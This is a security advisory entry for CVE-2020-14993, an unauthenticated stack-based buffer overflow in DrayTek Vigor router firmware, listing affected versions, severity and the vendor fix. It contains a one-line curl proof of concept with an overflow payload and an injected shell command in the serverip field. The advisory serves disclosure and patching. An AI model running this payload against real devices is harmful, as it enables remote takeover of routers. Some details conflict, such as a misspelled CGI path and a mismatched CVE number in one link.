#VU29336 Stack-based buffer overflow


Published: 2020-06-27

Vulnerability identifier: #VU29336

Vulnerability risk: High

CVSSv3.1: 8.8 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C]

CVE-ID: CVE-2020-14993

CWE-ID: CWE-121

Exploitation vector: Network

Exploit availability: No

Vulnerable software:
Vigor 3900
Hardware solutions / Routers & switches, VoIP, GSM, etc
Vigor 2960
Hardware solutions / Routers & switches, VoIP, GSM, etc
Vigor 300B
Hardware solutions / Routers & switches, VoIP, GSM, etc

Vendor: DrayTek Corp.

Description

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to a boundary error when processing data passed via the formuserphonenumber parameter in an authusersms action to mainfunction.cgi . A remote non-authenticated user can send a specially crafted request to the affected device, trigger a stack-based buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

PoC:

curl -d "action=authusersms&custom1=1;&custom2=1&custom3=1&formuserphonenumber=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xEC\xC7\x01&URL=www.baidu.com&HOST=123456897&serverip=";ls;echo 'pwn it';&filename=pwn" -X POST http://192.168.0.250/cgi-bin/mainfunciton.cgi

Mitigation
Install update from vendor's website.

Vulnerable software versions

Vigor 3900: 1.4.4 _ - 1.5.1

Vigor 2960: 1.3.1 _ - 1.5.1

Vigor 300B: 1.3.3 _ - 1.5.1


External links
http://github.com/dexterone/Vigor-poc
http://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-stack-based-buffer-overflow-vulnerability-(cve-2020-14473)


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, proof of concept for this vulnerability is available.


Latest bulletins with this vulnerability